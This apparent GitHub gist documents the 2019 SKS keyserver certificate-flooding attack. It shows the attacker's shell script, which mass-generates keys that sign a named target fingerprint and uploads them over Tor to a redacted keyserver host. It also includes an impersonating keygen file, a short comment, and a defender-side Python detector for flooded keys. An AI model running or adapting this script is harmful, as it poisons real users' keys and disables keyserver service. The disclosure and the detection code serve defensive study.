@lukateras
Last active December 13, 2020 16:38
Redacted SKS exploit that was sent to me by the attacker behind https://news.ycombinator.com/item?id=20312826
for _ in {1..500}; do
    for _ in {1..100}; do
        gpg --gen-key --batch keygen
        gpg --quick-sign-key -u Marc EC18257DB21746FC711054BEB19C61D61333360C
        rm ~/.gnupg/private-keys-v1.d/*.key
    done
    rm ~/.gnupg/openpgp-revocs.d/*.rev
    gpg -a --export > ~/Desktop/keyblock.asc
    rm ~/.gnupg/pub*
    rm ~/.gnupg/tofu.db
    rm ~/.gnupg/trustdb.gpg
    rm -r ~/.gnupg/openpgp-revocs.d
    rm -r ~/.gnupg/private-keys-v1.d
    mkdir ~/.gnupg/private-keys-v1.d
    gpg --import ~/Desktop/yt.asc
    curl \
        --socks5-hostname localhost:9050 \
        --data-urlencode "keytext@keyblock.asc" \
        --max-time 60 \
        example.com:11371/pks/add
    rm ~/Desktop/keyblock.asc
done

keygen (the --batch parameter file referenced by the script above):

Key-Type: default
Subkey-Type: default
Name-Real: Marc Horowitz
Name-Comment: Yegor, you did a great SKS research job so far! Hope you are well! May the best team win! :-)
Name-Email: marc@mit.edu
Expire-Date: 0
%no-protection
%commit

lambdafu commented Jul 5, 2019

It seems the main difficulty in this attack is preventing GnuPG from DoS'ing itself, so the home directory has to be purged frequently. Thanks for sharing this; it illustrates that no sophisticated tool like trollwot was necessary for the attack.
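An added, defender-side example (not part of the gist or of lambdafu's comment): a small Python parser over constructed `gpg --with-colons --list-sigs` output that counts third-party UID certifications per key and flags keys carrying the kind of flood the script above produces. The key IDs, the sample records and the threshold of 50 are assumptions; only the record fields documented in GnuPG's doc/DETAILS (field 5 = key ID, field 11 = signature class) are read.

```python
"""Flag OpenPGP keys carrying an abnormal number of third-party certifications.

Input is the machine-readable output of `gpg --with-colons --list-sigs`.
A flooded key is one where many distinct signers have each added one UID
certification (classes 0x10-0x13); self-signatures and subkey-binding
signatures (0x18) are not counted. GnuPG >= 2.2.17 can also drop such
certifications at import time with `--import-options self-sigs-only`.
"""

CERT_CLASSES = ("10", "11", "12", "13")  # generic/persona/casual/positive UID certs


def summarize_certifications(listing: str) -> dict:
    """Return {long_key_id: {"self": n, "third_party": n, "signers": set()}}."""
    summary, current = {}, None
    for line in listing.splitlines():
        fields = line.split(":")
        if fields[0] == "pub" and len(fields) > 4:
            current = fields[4]                      # field 5: long key ID
            summary[current] = {"self": 0, "third_party": 0, "signers": set()}
        elif fields[0] == "sig" and current is not None and len(fields) > 10:
            signer, sig_class = fields[4], fields[10][:2]   # fields 5 and 11
            if sig_class not in CERT_CLASSES:
                continue                             # binding/revocation sigs
            if signer == current:
                summary[current]["self"] += 1
            else:
                summary[current]["third_party"] += 1
                summary[current]["signers"].add(signer)
    return summary


def flooded_keys(listing: str, max_third_party: int = 50) -> list:
    """Key IDs whose third-party certification count exceeds the threshold."""
    s = summarize_certifications(listing)
    return sorted(k for k, v in s.items() if v["third_party"] > max_third_party)


def _sig(signer: str, sig_class: str = "10x") -> str:
    # Constructed sig record in --with-colons layout; only fields 5 and 11 matter here.
    return f"sig:::1:{signer}:1562284800::::Example Signer <x@example.org>:{sig_class}::::::::::"


NORMAL_KEY, TARGET_KEY = "1111111111111111", "2222222222222222"  # assumed IDs
# Constructed listing: one normal key (self-sig, two peers, a subkey) and one key
# certified by 500 throwaway keys, as the loop in the gist would produce.
SAMPLE_LISTING = "\n".join(
    [f"pub:u:4096:1:{NORMAL_KEY}:1500000000:::u:::scESC::::::23::0:",
     "uid:u::::1500000000::DEADBEEF::Normal User <normal@example.org>::::::::::0:",
     _sig(NORMAL_KEY, "13x"), _sig("AAAAAAAAAAAAAAAA"), _sig("BBBBBBBBBBBBBBBB"),
     "sub:u:4096:1:3333333333333333:1500000000::::::e::::::23:", _sig(NORMAL_KEY, "18x"),
     f"pub:u:4096:1:{TARGET_KEY}:1500000000:::u:::scESC::::::23::0:",
     "uid:u::::1500000000::CAFEBABE::Target User <target@example.org>::::::::::0:",
     _sig(TARGET_KEY, "13x")] + [_sig(f"{i:016X}") for i in range(500)])

if __name__ == "__main__":
    print("flooded:", flooded_keys(SAMPLE_LISTING))   # flooded: ['2222222222222222']
```

Against a real keyring, feed it `gpg --with-colons --list-sigs` output instead of SAMPLE_LISTING; the threshold should be tuned to how many certifications your keys legitimately carry.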
